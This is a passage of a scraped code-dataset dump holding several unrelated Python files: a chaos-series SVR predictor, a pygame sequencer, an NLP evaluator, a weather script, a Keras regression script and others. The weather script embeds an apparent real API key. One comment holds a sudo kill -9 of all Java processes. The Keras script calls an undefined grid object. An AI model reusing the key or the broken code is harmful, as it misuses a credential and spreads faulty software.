But by filtering out\n            those events, everything works fine.\n\n            \"\"\"\n            z_events = self._poller.poll(1000*timeout)\n            return [(fd, self._remap_events(evt)) for fd, evt in z_events\n                    if fd in self._fds]\n\n    class DebugLoop(PollIOLoop):\n        def initialize(self, **kwargs):\n            PollIOLoop.initialize(self, impl=DebugPoller(), **kwargs)\n\n        def handle_callback_exception(self, callback):\n            exc_type, exc_value, tb = sys.exc_info()\n            traceback.print_tb(tb)\n            raise exc_value\n\n        @staticmethod\n        def instance():\n            PollIOLoop.configure(DebugLoop)\n            return PollIOLoop.instance()\n\n        def start(self):\n            try:\n                super(DebugLoop, self).start()\n            except ZMQError as e:\n                if e.errno == ETERM:\n                    # quietly return on ETERM\n                    pass\n                else:\n                    raise e\n\n    from tornado import ioloop\n    ioloop.IOLoop.configure(DebugLoop)\n    return ioloop.IOLoop()\n","sub_path":"loadsagent/tests/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"612479549","text":"import matplotlib as mpl\n\nmpl.use('TKAgg')\nimport matplotlib.pyplot as plt\nimport segypy\nimport numpy as np\nfrom numpy.matlib import repmat\nfrom scipy.integrate import odeint\nimport pypsr\nfrom sklearn.svm import SVR # support vector regression\n\n\n'''Solve the ODE of the chaotic system'''\n# x''+a*x'-x+x^3=f*cos(t) -- the Duffing chaotic sequence\n\ndef Duffing(InitialValue, t, a, f):\n    x, y = InitialValue\n    dydt = [y, x - np.power(x, 3) - a * y + f * np.cos(t)]\n    return dydt\n\n\ny0 = [0, 0] # initial conditions\n\nt = np.linspace(0, 299, 300)\nprint(t)\n\na = 0.25 # damping coefficient\nf = 0.45 # forcing amplitude\n\nSol = odeint(Duffing, y0, t, args=(a, f)) # solve the ODE\n\nChaos = Sol[:, 0] # the chaotic sequence\nChaos = Chaos[:, np.newaxis]\n\nprint('Shape of the chaotic sequence:', np.shape(Chaos))\nprint('Data type of the chaotic sequence:', type(Chaos))\n\n'''Plot the chaotic sequence'''\nplt.figure(1)\nplt.plot(t, Chaos, 'b', label='x(t)')\nplt.title('Chaos')\nplt.legend(loc='best')\nplt.xlabel('t')\nplt.grid()\n\n\n\n'''Phase-space reconstruction'''\ndef PhaSpaRecon_multi(Chaos, tau, m):\n    # input: Chaos = chaotic sequence; tau = reconstruction delay; m = embedding dimension\n    # output: xn = point sequence in phase space (each column is one phase-space point)\n\n    Length = len(Chaos) # store the sequence length\n    print('Length of the chaotic sequence:', Length)\n    ChaosNew = np.reshape(Chaos, (1, Length))\n    print('Reshaped Chaos:', np.shape(ChaosNew))\n    print('Chaos after reshaping:',ChaosNew)\n\n    if Length - (m - 1) * tau < 1:\n        print('delay time or the embedding dimension is too large')\n        xn = []\n\n    else:\n        xn = np.empty((m, Length -(m - 1) * tau))\n        print('Preallocated phase-space size:', np.shape(xn))\n        for i in range(m):\n            xn[i, :] = ChaosNew[0, 1+(i+1) * tau-tau-1:Length -m*tau+(i+1)*tau]\n        print('Reconstructed sequence:', np.transpose(xn))\n        print('Size of the phase-space point sequence:', np.shape(xn))\n    return xn\n\ndef PhaSpaRecon_one(Chaos, tau, m):\n    # input: Chaos = chaotic sequence; tau = reconstruction delay; m = embedding dimension\n    # output: xn = point sequence in phase space (each column is one phase-space point); dn = one-step prediction target\n\n    Length = len(Chaos) # store the sequence length\n    print('Length of the chaotic sequence:', Length)\n    ChaosNew = np.reshape(Chaos, (1, Length))\n    print('Reshaped Chaos:', np.shape(ChaosNew))\n    if Length - 1 - (m - 1) * tau < 1:\n        print('delay time or the embedding dimension is too large')\n        xn = []\n        dn = []\n    else:\n        xn = np.empty((m, Length - 1 - (m - 1) * tau))\n        print('Preallocated phase-space size:', np.shape(xn))\n        for i in range(m):\n            xn[i, :] = ChaosNew[0, (i + 1 - 1) * tau:Length - 1 - (m - (i + 1)) * tau]\n        print('Reconstructed sequence:', np.transpose(xn))\n        print('Size of the phase-space point sequence:', np.shape(xn))\n\n        dn = ChaosNew[0, 1 + (m - 1) * tau:Length]\n\n        print('The shape of dn:',np.shape(dn))\n    # dnReshape=np.reshape(dn,(1,d_len))\n    return xn, dn\n\n\n'''test'''\nNum_Train = 100 # number of training points\nNum_Test = 100 # number of test points\n\nChaosTrain = Chaos[:Num_Train, 0]\nChaosTrain = 
ChaosTrain[:, np.newaxis] # training samples\nprint(np.shape(ChaosTrain))\nprint('Chaotic sequence:',np.transpose(ChaosTrain))\n\nChaosTest = Chaos[Num_Train:Num_Train + Num_Test, 0]\nChaosTest = ChaosTest[:, np.newaxis] # test samples\nprint(np.shape(ChaosTest))\n\n'''Parameters'''\nd=10 # embedding dimension\nt=7 # delay time\n\nXn_Tr, Dn_Tr = PhaSpaRecon_one(ChaosTrain, t, d) # phase-space reconstruction of the training samples\n\n\n\n''' Fit regression model '''\nsvr_rbf = SVR(C=1e3, cache_size=200, coef0=0.0, degree=3, epsilon=0.1, gamma='auto',\n              kernel='rbf', max_iter=-1, shrinking=True, tol=0.001, verbose=False) # Gaussian radial basis function (RBF) kernel\n\nNum_Pr=50 # predict the next 50 points\n\nX_st=Chaos[Num_Train-(d-1)*t-1:Num_Train]\nprint('Chaotic sequence:',X_st)\n\nPredictResults_Pr=np.empty(Num_Pr)\n\n\n'''Iterated multi-step prediction'''\nfor i in np.arange(Num_Pr):\n    print('Prediction step', i+1)\n    XN_st=PhaSpaRecon_multi(X_st,t,d)\n    PredictResults_Pr[i] = svr_rbf.fit(np.transpose(Xn_Tr), Dn_Tr).predict(np.transpose(XN_st)) # fit on the reconstructed training data, then predict\n    print('Single-step prediction:',PredictResults_Pr[i],type(PredictResults_Pr[i]))\n    List_X_st=X_st[1:,0].tolist() # append the prediction to the end of the sequence for the next reconstruction\n    List_X_st.append(PredictResults_Pr[i])\n    X_st=np.array(List_X_st)\n    X_st=np.reshape(X_st,(len(X_st),1))\n    print(X_st)\n\nPredictTarget=Chaos[Num_Train:Num_Train+Num_Pr] # prediction target\n\n'''Prediction error'''\nError_pr=np.transpose(PredictTarget)-PredictResults_Pr\n'''Plot the prediction results'''\nplt.figure(4)\nplt.plot(np.transpose(PredictResults_Pr), 'b', label='Pre_Pr(t)')\nplt.legend(loc='best')\nplt.title('Predict results')\nplt.xlabel('t')\nplt.grid()\n\n'''Compare the predictions with the original sequence'''\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nplt.figure(5)\nplt.subplot(2, 1, 1) # predictions vs ground truth\nplt.plot(PredictTarget, '-b', label='Original')\nplt.plot(np.transpose(PredictResults_Pr), '--r', label='Predict')\nplt.legend(loc='lower right')\nplt.xlabel('t')\nplt.title('Ground truth (.) vs predictions (-) on the training samples')\n\nplt.subplot(2, 1, 2) # prediction error curve\nplt.plot(np.transpose(Error_pr), 'b', label='Error')\nplt.legend(loc='best')\nplt.title('Prediction error curve')\nplt.xlabel('t')\nplt.grid()\nplt.show()","sub_path":"seismic data in ML/Multi-predict-Duffing.py","file_name":"Multi-predict-Duffing.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108030301","text":"#Earth.py\nimport pygame\n\nclass Earth(pygame.sprite.Sprite):\n    def __init__(self, initial_position):\n        pygame.sprite.Sprite.__init__(self)\n        image = pygame.image.load(\"images/earth_40x10.jpg\")\n        image = image.convert()\n        self.image, self.rect = image, image.get_rect()\n        self.rect.topleft = initial_position\n\n    def draw(self, window_surface):\n        window_surface.blit(self.image, self.rect)\t\n","sub_path":"code/RLTankAttack/v2__array_version/Earth.py","file_name":"Earth.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122366028","text":"import sys, time, random\nfrom time import sleep, perf_counter\nimport json\nimport os.path\nimport gc\nimport glob\nimport random\nimport soundfile as sf\nimport contextlib\n\nwith contextlib.redirect_stdout(None):\n    import pygame\n\nfrom time import time, sleep\nfrom datetime import datetime\nfrom os import path\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\nfrom PyQt5.QtCore import Qt\n\nfrom waveform import Waveform\n\nfrom threading import Thread\n\n# ram stores\n\n_sound_library = {}\n\n# config\n\nCONFIG = {\n    'app_name': 'bg @ 
0.1',\n 'window_width': 500,\n 'window_height': 400,\n 'channel_num': 4,\n 'store_dir': 'data/',\n 'waveforms_dir': 'waveforms/',\n 'samples_dir': 'samples/',\n 'library_dir': 'library/'\n}\n\n# helper\n\ndef log(msg):\n print('%s: %s' % (datetime.utcnow().strftime('%M:%S.%f')[:-4], msg))\n\ndef get_state():\n if path.exists(CONFIG['store_dir'] + '/state.json'):\n with open(CONFIG['store_dir'] + '/state.json') as json_file:\n return json.load(json_file)\n else:\n return {\n 'bpm': 120,\n 'bars': 1\n }\n\ndef set_state(state):\n with open(CONFIG['store_dir'] + '/state.json', 'w') as outfile:\n return json.dump(state, outfile)\n\ndef quit_app():\n print('quit')\n\ndef load_samples():\n count = len(glob.glob(CONFIG['samples_dir'] + '/*.wav'))\n\n log('loading %s samples' % count)\n\n for filename in glob.glob(CONFIG['samples_dir'] + '/*.wav'):\n log('loading %s' % filename)\n\n lib_filename = filename.replace(CONFIG['samples_dir'], CONFIG['library_dir'])\n\n if not path.exists(lib_filename):\n log('converting %s' % filename)\n\n data, samplerate = sf.read(filename)\n sf.write(lib_filename, data, 44100, subtype='PCM_16')\n\n for filename in glob.glob(CONFIG['library_dir'] + '/*.wav'):\n sound = pygame.mixer.Sound(filename)\n _sound_library[os.path.basename(filename)] = sound\n\n wv_filename = filename.replace(\n CONFIG['library_dir'],\n CONFIG['waveforms_dir']\n ).replace('.wav', '.gif')\n\n if not path.exists(wv_filename):\n log('creating waveform for %s' % filename)\n\n waveform = Waveform(filename)\n waveform.save(wv_filename)\n\n# audio channel init\n\nwith contextlib.redirect_stdout(None):\n pygame.mixer.pre_init(44100, -16, 2, 256)\n pygame.mixer.init()\n pygame.init()\n\nCHANNELS = []\n\nfor i in range(0, CONFIG['channel_num']):\n CHANNELS.append(pygame.mixer.Channel(i))\n\n# recover state\n\nSTATE = get_state()\n\nSTATE['current_step'] = 0\nSTATE['bpm'] = 122\n\nSTATE['tracks'] = [\n {'channel': 0, 'stutter': False, 'volume': 1, 'sample_id': 'dt_synth_122_sing_G#m.wav', 'grid': [0]},\n {'channel': 1, 'stutter': True, 'volume': 1, 'sample_id': 'kick.wav', 'grid': [0,4,8,12]},\n {'channel': 2, 'stutter': True, 'volume': 1, 'sample_id': 'hat-2.wav', 'grid': [0,2,4,8,10,11,12]},\n {'channel': 3, 'stutter': True, 'volume': 1, 'sample_id': 'hat-3.wav', 'grid': [0,2,4,8,10,11,12]},\n]\n\n# print(CHANNELS[0])\n\nset_state(STATE)\n\n# hey!\n\nwindow = {}\n\nlog('hey!')\n\n# load library\n\nload_samples()\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n\n # self.actionExit.setShortcutContext(QtCore.Qt.ApplicationShortcut)\n self.shortcut = QShortcut(QKeySequence(\"ESCAPE\"), self)\n self.shortcut.activated.connect(self.on_quit)\n\n self.shortcut = QShortcut(QKeySequence(\"Ctrl+Q\"), self)\n self.shortcut.activated.connect(self.on_quit)\n\n self.window_width = CONFIG['window_width']\n self.window_height = CONFIG['window_height']\n\n self.tracks_padding_left = 20\n self.tracks_padding_right = 20\n\n self.label = QtWidgets.QLabel()\n canvas = QtGui.QPixmap(self.window_width, self.window_height)\n\n self.setWindowTitle(CONFIG['app_name'])\n self.setFixedSize(self.window_width, self.window_height)\n\n self.label.setPixmap(canvas)\n self.setCentralWidget(self.label)\n self.draw()\n\n self.btn = QPushButton(\"play\", self)\n # self.btn.clicked.connect(self.draw())\n self.btn.move(10, 10)\n\n # self.timer = QtCore.QTimer()\n # self.timer.timeout.connect(self.draw)\n # self.timer.start(70)\n\n def on_quit(self):\n STATE['do_quit'] = True\n exit()\n\n def 
draw(self):\n p = QtGui.QPainter(self.label.pixmap())\n\n p.fillRect(self.rect(), QColor(0, 0, 0, 190))\n\n def draw_tracks(p):\n tracks_width = (self.window_width - (self.tracks_padding_left + self.tracks_padding_right))\n\n steps = 16 * STATE['bars']\n\n track_cell_height = 90\n track_cell_width = tracks_width / steps\n\n y = 0\n for track in STATE['tracks']:\n for step in range(0, (16 * STATE['bars'])):\n # p.setBrush(QBrush(Qt.green, Qt.DiagCrossPattern))\n # p.drawRect(self.tracks_padding_left+(step*track_cell_width), y*track_cell_height, track_cell_width,track_cell_height)\n\n # waveform_path = track['sample_id'].replace(\n # CONFIG['samples_dir'],\n # CONFIG['waveforms_dir']\n # ).replace('.wav', '.gif')\n\n # print(waveform_path)\n\n ahead = 0\n\n for n in range(step, (16 * STATE['bars'])):\n if n not in track['grid']:\n ahead = ahead + 1\n else:\n break\n\n if step in track['grid']:\n p.drawImage(\n QtCore.QRect(\n self.tracks_padding_left+((step+ahead)*track_cell_width),\n y*track_cell_height,\n track_cell_height,\n track_cell_width\n ),\n QtGui.QImage('%s/%s' % (CONFIG['waveforms_dir'], track['sample_id'].replace('.wav', '.gif')))\n )\n y = y + 1\n\n # y = 0\n # for n in range(0,4):\n # for x in range(0,8):\n # p.drawRect(y, st, 400,200)\n # p.drawImage(\n # QtCore.QRect(x*width, y, width, width),\n # QtGui.QImage(\"waveforms/Abletunes TSD Snare 27.gif\")\n # )\n # y = y + width\n\n def draw_cursor(p):\n pen = QPen(Qt.white, 3)\n p.setPen(pen)\n\n steps = 16 * STATE['bars']\n \n tracks_width = (self.window_width - (self.tracks_padding_left + self.tracks_padding_right))\n\n x = (tracks_width/steps) * STATE['current_step']\n\n p.drawLine(\n x,\n 0,\n x,\n self.window_height\n )\n\n def draw_text(p):\n p.drawText(\n random.randint(0,100),\n random.randint(0,100),\n str(STATE['bpm'])\n )\n\n draw_tracks(p)\n draw_cursor(p)\n draw_text(p)\n\n p.end()\n\n self.update()\n\ndef update_window():\n if window:\n window.draw()\n\ndef audioManager():\n def shuffle_track(TRACK):\n inc = random.randint(1,8)\n grid = []\n step = 0\n\n while step <= max_steps:\n grid.append(step)\n step = step + inc\n\n TRACK['grid'] = grid\n\n def play(channel, sample_id):\n if sample_id in _sound_library:\n channel.play(_sound_library[sample_id])\n\n delay = d = 60 / 120\n print(60 / delay, 'bpm')\n prev = perf_counter()\n\n # for i in range(20):\n \n\n DELTA = (60/(STATE['bpm'] * 4))\n GOAL = time()\n\n max_steps = 16 * STATE['bars']\n step = STATE['current_step']\n\n while True:\n if step >= max_steps:\n step = 0\n\n update_window()\n\n STATE['current_step'] = step\n\n play_output = []\n\n if 'do_quit' in STATE and STATE['do_quit']:\n exit()\n\n for TRACK in STATE['tracks']:\n channel = CHANNELS[TRACK['channel']]\n sample_id = TRACK['sample_id']\n\n if 'volume' in TRACK:\n channel.set_volume(TRACK['volume'])\n\n if 'stutter' in TRACK and TRACK['stutter']:\n channel.set_volume(random.randint(80,100)/100)\n\n if 'sample_id' in TRACK and 'grid' in TRACK and TRACK['sample_id']:\n if step in TRACK['grid']:\n if channel.get_busy():\n channel.stop()\n\n play(channel, TRACK['sample_id'])\n play_output.append('[%s]' % TRACK['sample_id'][0:6])\n\n log('playing %s' % (' '.join(play_output)))\n\n # print('%s/%s %s' % (step, max_steps, ))\n\n if step % 8 == 0 and random.randint(0,100) > 40:\n random_track = random.choice(STATE['tracks'])\n shuffle_track(random_track)\n\n step = step + 1\n\n sleep(d)\n t = perf_counter()\n delta = t - prev - delay\n print('{:+.9f}'.format(delta))\n d -= delta\n prev = t\n\n # GOAL += 
DELTA\n\n # gc.collect()\n\n # sleepInterval = GOAL - time()\n\n # if sleepInterval >= 0:\n # sleep(sleepInterval)\n # else:\n # sleep(0)\n\nif __name__ == '__main__':\n Thread(target = audioManager).start()\n\n # app = QtWidgets.QApplication(sys.argv)\n \n # window = MainWindow()\n # window.show()\n # app.exec_()\n\n\n","sub_path":"archive/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"8257904","text":"import sys\nimport os, argparse\nimport annotate_desc\nfrom collections import defaultdict\n\npath = sys.path[0]\nos.chdir(path)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-src', help='src-test file')\nparser.add_argument('-tgt', help='tgt-test file')\nparser.add_argument('-res', help='result file')\nargs = parser.parse_args()\n\nground_truth_lis_all = []\nwith open(args.tgt,'r') as file:\n lines = file.readlines()\nfor line in lines:\n line = line.strip()\n sent = annotate_desc.TypeDesc(line)\n sent.find_heads_id()\n words = sent.words\n head_ids = sent.hed_ids\n heads = [ words[i] for i in head_ids ]\n ground_truth_lis_all.append( heads )\n\nsub_is_list_all = []\nlength = len(ground_truth_lis_all)\nwith open(args.src,'r') as file:\n lines = file.readlines()\nfor line in lines:\n line = line.strip()\n triples = line.split(' ')\n lis = []\n for triple in triples:\n if 'instance_of' in triple:\n val, _, _ = triple.split(u'│')\n lis.append(val)\n if 'subclass_of' in triple:\n val, _, _ = triple.split(u'│')\n lis.append(val)\n lis = list(set(lis))\n sub_is_list_all.append(lis)\n\n\nall_num = 0\ncorrect_num = 0\nwith open(args.res,'r') as file: #change\n lines = file.readlines()\ni = 0\nfor line in lines:\n line = line.strip()\n if line == '':\n i += 1\n continue\n sent = annotate_desc.TypeDesc(line)\n sent.find_heads_id()\n words = sent.words\n head_ids = sent.hed_ids\n heads = [ words[i] for i in head_ids ]\n\n all_num += len(heads)\n\n gt_lis = ground_truth_lis_all[i]\n si_lis = sub_is_list_all[i]\n for head in heads:\n if head in gt_lis or head in si_lis:\n #print (head, gt_lis, si_lis)\n correct_num += 1\n else:\n #print (head, gt_lis, si_lis)\n pass\n i += 1\n\nprint (correct_num/all_num)\n#java -mx4g -cp \"*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000\n#ps -ef | grep java | grep -v grep | awk '{print $2}' | sudo xargs kill -9","sub_path":"eval/hedacc.py","file_name":"hedacc.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"316851356","text":"import pyowm\n\n\ndef main():\n \"\"\"\n Gets temperature of 'city_name' in 'celsius' using the 'api_key', only for python 3.X.\n :return: Float value, using \"\"Degrees\"\" character.\n \"\"\"\n try:\n api_key = \"b5bcf5fa41abed55ddf71ea40aa6f4ea\"\n city_name = \"Artur Nogueira,BR\"\n # city_name = \"Campinas,BR\"\n\n owm = pyowm.OWM(api_key)\n weather_at_place = owm.weather_at_place(city_name)\n get_temp_celsius = weather_at_place.get_weather().get_temperature(\"celsius\")\n # format == {'temp_max': 10.5, 'temp': 9.7, 'temp_min': 9.0}\n weather_int_value = get_temp_celsius['temp']\n print(\"%s: %.1f°C\" % (city_name, weather_int_value))\n # return \"%s: %.1f°C\" % (city_name, weather_int_value)\n except:\n print(\"ERROR!\")\n # return \"ERROR!\"\n\n\nif __name__ == '__main__':\n 
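# The bare `except:` in main() above swallows every failure, including
# KeyboardInterrupt. A sketch of the same lookup with a narrower handler;
# the pyowm calls simply mirror the legacy API already used in the sample:
def safe_temperature(owm, city_name):
    try:
        weather = owm.weather_at_place(city_name).get_weather()
        return weather.get_temperature("celsius")["temp"]
    except Exception as exc:             # still broad, but no longer traps exits
        print("weather lookup failed: %s" % exc)
        return None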
main()\n","sub_path":".scripts/statusbar/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"241531885","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 9 18:59:49 2018\n\n@author: louk\n\"\"\"\n\nimport scipy.io as sio\nimport pandas as pd\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, MaxPooling2D\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom keras import regularizers\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import KFold,StratifiedKFold\nfrom sklearn.model_selection import cross_val_score,cross_val_predict\n\nimport pickle\nfrom scipy.signal import decimate\nseed=7\ntr_result={}\ntst_result={}\n\ndataset='ekl_tensordata_for_louk.mat'\nmat_contents=sio.loadmat(dataset)\nX=mat_contents['mmec_tnsr_fqm_forcomparison']\nX=decimate(X,8,axis=1)\nY=mat_contents['mmec_subj_infoMAT']\nnsubj=X.shape[2]\n\nfor subj_idx in range( 0 , 50 ) : #loop over subjects\n print('Subject ' + str(subj_idx) + '\\n')\n no_features=X.shape[0]*X.shape[1]\n tst_idx=subj_idx\n trn_idx=np.r_[0:subj_idx, subj_idx+1:nsubj]\n \n Xdense=X.reshape(no_features,nsubj)\n Xdense=Xdense.transpose() \n scaler=StandardScaler()\n scaler.fit(Xdense[trn_idx,:])\n Xdense=scaler.transform(Xdense)\n #Xcnn=X.transpose(2, 0, 1) # transpose such that examples are 1st\n\n age=Y[:,0]\n \n def generate_model():\n model = Sequential()\n # if ntype==1:\n model.add(Dense(round(no_features), input_dim=no_features, kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate))\n model.add(Dense(round(no_features/2), kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate)) \n model.add(Dense(round(no_features/2), kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate)) \n model.add(Dense(round(no_features/4), kernel_regularizer=regularizers.l2(l2_penalty), activation='relu')) # last layer should be linear so that we can have negative values as well\n model.add(Dropout(dropout_rate)) \n model.add(Dense(1, kernel_regularizer=regularizers.l2(l2_penalty), activation='linear')) # last layer should be linear so that we can have negative values as well\n\n model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse']) #mse for regression\n return model\n \n l2_penalty=[10]\n ntype=[1]\n dropout_rate = [0.0]\n estimator=KerasRegressor(build_fn=generate_model, epochs=1000, batch_size=10 , verbose=1)\n\n # param_grid = dict(no_features=[no_features],l2_penalty=l2_penalty, type=type, dropout_rate=dropout_rate)\n# grid = None;\n# grid = GridSearchCV( estimator=estimator, param_grid=param_grid, cv=2 , scoring='mean_squared_error')\n# grid = grid.fit(Xdense[trn_idx,:], age[trn_idx])\n n_folds=10;\n kfold = KFold(n_splits=n_folds, shuffle=True, random_state=seed)\n y_pred = cross_val_predict(estimator,Xdense[trn_idx,:],age[trn_idx],cv=kfold) \n tr_result[subj_idx]=grid.predict(Xdense[trn_idx,:])\n 
tst_result[subj_idx]=grid.predict(np.reshape(Xdense[tst_idx,:],(1,no_features)))\n \n# with open('file.txt', 'w') as file:\n# file.write(str(tr_result))\n with open('file.txt', 'w') as file:\n file.write(str(tst_result))\n \n","sub_path":"score_regression.py","file_name":"score_regression.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161348946","text":"import sys\n\ndef input_parser(input_path):\n with open(input_path, 'r') as f:\n c = int(f.readline())\n for case in range(c):\n strs = f.readline().strip()\n yield case, (strs,)\n\ndef get_output_path(input_path):\n return input_path[:-2] + \"out\"\n\ndef output(f, s):\n print(s)\n f.write(s + \"\\n\")\n\ndef merge_pancakes(pan):\n simple_pan = []\n last = None\n for char in pan:\n if char == last:\n continue\n simple_pan.append(char)\n last = char\n return simple_pan\n\ndef problem(pan):\n pan = merge_pancakes(pan)\n if pan[-1] == '+':\n del pan[-1]\n return len(pan)\n\ndef main():\n input_path = sys.argv[1]\n with open(get_output_path(input_path), 'w') as g:\n for case, data in input_parser(input_path):\n out = problem(*data)\n output(g, \"Case #{}: {}\".format(case+1, out))\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"codes/CodeJamCrawler/16_0_2/quimcastella/revenge_pancakes.py","file_name":"revenge_pancakes.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"446702977","text":"#!/usr/bin/env python3\n\nimport rospy\nimport message_filters\n\nimport numpy as np\nimport time\n\nfrom gazebo_msgs.msg import ModelStates\nfrom std_msgs.msg import Float64MultiArray , Float64\n\nclass time_count(object):\n\n def __init__(self):\n\n rospy.init_node(\"time_count\",anonymous=True)\n\n pos = message_filters.Subscriber(\"/gazebo/model_states\",ModelStates)\n goal_state = message_filters.Subscriber(\"/goal_state\",Float64MultiArray)\n\n ms_fil = message_filters.ApproximateTimeSynchronizer([pos,goal_state],10,0.5,allow_headerless=True)\n\n ms_fil.registerCallback(self.callback)\n\n self.pub = rospy.Publisher(\"/time_count/time\",Float64,queue_size=10)\n\n self.on_pos_x = False\n self.on_pos_y = False\n self.on_pos_z = False\n\n self.start_time = None\n\n self.elips = 0\n\n def callback(self,pos,goal_state):\n\n index_pos = pos.name.index(\"quadrotor\")\n pose = pos.pose[index_pos].position\n pose = np.array([pose.x,pose.y,pose.z])\n goal = np.array(goal_state.data)\n\n self.dif = abs(goal - pose)\n\n print(\"pose : \",pose)\n print(\"goal : \",goal)\n\n self.time_count()\n\n def time_count(self):\n\n print((self.dif <= 0.1).all())\n\n if (self.dif <= 0.1).all():\n\n if self.start_time is None:\n\n self.start_time = time.time()\n self.elips = 0\n \n elif not self.start_time is None:\n\n self.elips = time.time() - self.start_time\n # self.start_time = None\n\n self.pub.publish(Float64(self.elips))\n\n else:\n\n self.start_time = None\n\n\nif __name__ == \"__main__\":\n\n timee = time_count()\n\n rospy.spin()","sub_path":"ros/quadrotor/src/quad_sim/script/time_count.py","file_name":"time_count.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"231357073","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nShowcases optical phenomenons plotting examples.\n\"\"\"\n\nfrom colour.phenomenons import rayleigh_scattering_spd\nfrom 
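# merge_pancakes()/problem() above collapse runs of identical signs; the
# answer is the number of runs, minus one when the stack already ends
# happy-side up. An equivalent one-pass version using itertools.groupby:
from itertools import groupby

def min_flips(stack):
    runs = [key for key, _ in groupby(stack)]    # '--+-' -> ['-', '+', '-']
    return len(runs) - (1 if runs and runs[-1] == '+' else 0)

assert min_flips('-') == 1 and min_flips('+') == 0
assert min_flips('+-') == 2 and min_flips('--+-') == 3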
colour.plotting import * # noqa\nfrom colour.utilities.verbose import message_box\n\nmessage_box('Optical Phenomenons Plots')\n\nmessage_box(('Plotting a single \"Rayleigh Scattering\" spectral power '\n 'distribution.'))\nsingle_rayleigh_scattering_spd_plot()\n\nprint('\\n')\n\nmessage_box(('Comparing multiple \"Rayleigh Scattering\" spectral power '\n 'distributions with different CO_2 concentrations.'))\nname_template = 'Rayleigh Scattering - CO2: {0} ppm'\nrayleigh_spds = []\nfor ppm in (0, 50, 300):\n rayleigh_spd = rayleigh_scattering_spd(CO2_concentration=ppm)\n rayleigh_spd.name = name_template.format(ppm)\n rayleigh_spds.append(rayleigh_spd)\nmulti_spd_plot(rayleigh_spds,\n title=('Rayleigh Optical Depth - '\n 'Comparing \"C02\" Concentration Influence'),\n y_label='Optical Depth',\n legend_location='upper right')\n\nprint('\\n')\n\nmessage_box('Plotting \"The blue Sky\".')\nthe_blue_sky_plot()\n","sub_path":"colour/examples/plotting/examples_phenomenon_plots.py","file_name":"examples_phenomenon_plots.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"445716969","text":"'''\nAuthors\n - C. Selmi: written in 2020\n'''\nimport unittest\nimport numpy as np\n\nclass TestCalc(unittest.TestCase):\n\n def setUp(self):\n from m4.configuration import start\n self.ott, self._interf = start.create_ott()\n from m4.utils.optical_calibration import OpticalCalibration\n self.cal = OpticalCalibration(self.ott, self._interf)\n\n def tearDown(self):\n del(self.cal, self.ott)\n\n @unittest.skip('Salvataggio e lettura dati')\n def testCalibration(self):\n old_or_new = 1\n command_amp_vector = np.ones(5)\n n_push_pull = 1\n n_frames = 1\n mask_index = 4 #4 per il simulatore\n tt = self.cal.measureCalibrationMatrix(0, command_amp_vector,\n n_push_pull, n_frames, old_or_new)\n int_mat, rec = self.cal.analyzerCalibrationMeasurement(tt,\n mask_index)\n","sub_path":"test/test_calibration.py","file_name":"test_calibration.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"126231576","text":"#!/usr/bin/python\n###############################################################################\n# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. #\n# #\n# Licensed under the Apache License Version 2.0 (the \"License\"). You may not #\n# use this file except in compliance with the License. A copy of the License #\n# is located at #\n# #\n# http://www.apache.org/licenses/ #\n# #\n# or in the \"license\" file accompanying this file. This file is distributed #\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express #\n# or implied. See the License for the specific language governing permis- #\n# sions and limitations under the License. 
